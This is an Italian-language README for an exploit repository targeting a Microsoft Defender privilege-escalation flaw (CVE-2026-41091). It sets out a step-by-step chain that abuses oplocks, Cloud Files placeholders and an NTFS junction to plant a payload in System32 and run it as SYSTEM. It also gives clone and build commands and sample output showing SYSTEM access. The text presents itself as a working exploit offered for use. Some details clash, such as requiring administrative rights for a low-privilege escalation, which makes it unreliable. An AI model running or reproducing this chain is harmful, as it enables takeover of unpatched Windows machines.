
CVE-2026-41091 RedSun | Exploit LPE di Microsoft Defender. Utenti con privilegi ridotti ottengono NT AUTHORITY\SYSTEM 🔥 tramite API Cloud Files + trucco junction NTFS. Costringe Defender a scrivere payload dannosi in System32 con diritti SYSTEM. ⚠️ Attivamente sfruttato in natura. CVSS 7.8. Patch: Defender Engine 1.1.26040.8. 🛡️ Solo PoC educativo.

Vulnerabilità di Link Following in Microsoft Defender - Escalation di privilegi locali a NT AUTHORITY\SYSTEM
Questo repository contiene un Proof of Concept (PoC) funzionante completo per CVE-2026-41091, una vulnerabilità critica di escalation di privilegi locali in Microsoft Defender (Microsoft Malware Protection Engine). Sfruttando una risoluzione impropria dei link (CWE-59), un utente malintenzionato autenticato con bassi privilegi può ottenere privilegi NT AUTHORITY\SYSTEM.
La vulnerabilità, nota anche come "RedSun" o "SolarFlare", consente agli aggressori di ingannare Microsoft Defender per scrivere file arbitrari in posizioni di sistema protette con privilegi SYSTEM utilizzando l'API Cloud Files (CfAPI) e i punti di giunzione NTFS.
Nota: Questo repository include due versioni:
basic_poc.cpp- Dimostrazione semplificata dell'algoritmo (didattica)full_poc.cpp- Exploit completo funzionante con tutte le funzionalità
| Prodotto | Versioni affette | Versioni corrette |
|---|---|---|
| Microsoft Malware Protection Engine | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender Antimalware Platform | < 4.18.26040.7 | 4.18.26040.7+ |
┌─────────────────────────────────────────────────────────────────────────────┐
│ CATENA DI SFRUTTAMENTO SOLARFLARE │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ 1. Crea directory di lavoro │
│ └─> %TEMP%\SF-XXXX\ │
│ │
│ 2. Attiva Defender con EICAR │
│ └─> Scrivi EICAR rovesciato nel file esca │
│ │
│ 3. Attendi snapshot VSS │
│ └─> Rileva creazione di Volume Shadow Copy │
│ │
│ 4. Crea primo Batch Oplock │
│ └─> FSCTL_REQUEST_BATCH_OPLOCK sul file esca │
│ │
│ 5. Attendi rottura Oplock │
│ └─> Ottieni accesso esclusivo │
│ │
│ 6. Rinomina directory │
│ └─> Sposta directory originale in .tmp │
│ │
│ 7. Registra radice di sincronizzazione cloud │
│ └─> CfRegisterSyncRoot con API Cloud Files │
│ │
│ 8. Crea segnaposto cloud │
│ └─> CfCreatePlaceholders per il file esca │
│ │
│ 9. Crea secondo Batch Oplock │
│ └─> FSCTL_REQUEST_BATCH_OPLOCK sul segnaposto cloud │
│ │
│ 10. Attendi seconda rottura Oplock │
│ └─> Ottieni accesso esclusivo │
│ │
│ 11. Rinomina directory cloud │
│ └─> Sposta directory cloud in .cloud.tmp │
│ │
│ 12. Crea giunzione NTFS verso System32 │
│ └─> Reindirizza a C:\Windows\System32 │
│ │
│ 13. Copia payload in System32 │
│ └─> Copia file esca in System32 come TieringEngineService.exe │
│ │
│ 14. Attiva servizio come SYSTEM │
│ └─> CoCreateInstance(StorageTiersManagement) │
│ │
└─────────────────────────────────────────────────────────────────────────────┘
# Clona il repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# Compila usando il Prompt dei comandi per sviluppatori di Visual Studio
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# Oppure compila la versione base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
full_poc.exe
basic_poc.exe
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] Exploit SolarFlare avviato.
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] Snapshot VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Rinominazione directory cloud...
[+] Directory cloud rinominata
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\TieringEngineService.exe
[*] Attivazione servizio Storage Tiers Management...
[+] Servizio attivato come SYSTEM
[+] Accesso SYSTEM ottenuto!
CVE-2026-41091 Basic PoC
========================================
Solo dimostrazione algoritmo
========================================
[*] Avvio algoritmo exploit...
[*] Creazione directory di lavoro...
[+] Directory creata: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Attivazione Defender con EICAR...
[+] Defender attivato
[*] Attesa snapshot VSS...
[+] VSS rilevato
[*] Creazione primo oplock...
[+] Primo oplock creato
[*] Attesa rottura oplock...
[+] Oplock acquisito
[*] Rinominazione directory...
[+] Directory rinominata
[*] Creazione secondo oplock...
[+] Secondo oplock creato
[*] Attesa secondo oplock...
[+] Secondo oplock acquisito
[*] Creazione giunzione NTFS verso System32...
[+] Giunzione creata
[*] Attesa che Defender finisca...
[*] Copia payload in System32...
[+] Payload copiato in C:\Windows\System32\Payload.exe
[+] Dimostrazione algoritmo completata!
[i] Questo è solo l'algoritmo base.
[i] Per l'escalation completa a SYSTEM,
[i] usare full_poc.cpp con Cloud API e attivazione COM.
# Exploit completo
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# PoC base
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
Dai un'occhiata agli altri miei repository di exploit:
| Categoria | Funzionalità |
|---|
| Sfruttamento | ✅ Escalation di privilegi locali a SYSTEM ✅ Integrazione con Cloud Files API (CfAPI) ✅ Creazione di segnaposto cloud ✅ Reindirizzamento tramite giunzione NTFS |
| Tecniche | ✅ Abuso di Batch Oplock ✅ Rilevamento snapshot VSS ✅ Trigger EICAR ✅ Attivazione servizio COM |
| Target | ✅ Microsoft Defender < 1.1.26040.8 ✅ Windows 10/11 ✅ Windows Server 2019/2022 |
| Usabilità | ✅ Logging dettagliato ✅ Gestione errori ✅ Nomi di directory casuali ✅ Pulizia automatica |
| Attributo | Valore |
|---|
| ID CVE | CVE-2026-41091 |
| Punteggio CVSS | 7.8 (Alto) |
| Vettore CVSS | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| Vettore d'attacco | Locale |
| Privilegi richiesti | Bassi |
| Interazione utente | Nessuna |
| Impatto | Esecuzione di codice a livello SYSTEM |
| CISA KEV | ✅ Sì (sfruttato attivamente in natura) |
| Patch disponibile | Microsoft Malware Protection Engine 1.1.26040.8 |
| Requisito | Dettagli |
|---|
| SO | Windows 10/11, Server 2019/2022 |
| Privilegi | Amministrativi (per l'esecuzione) |
| Defender | Microsoft Defender deve essere abilitato |
| Internet | Necessario per il rilevamento snapshot VSS |
| Patch | Funziona solo su sistemi non aggiornati |
| Architettura | Solo x64 |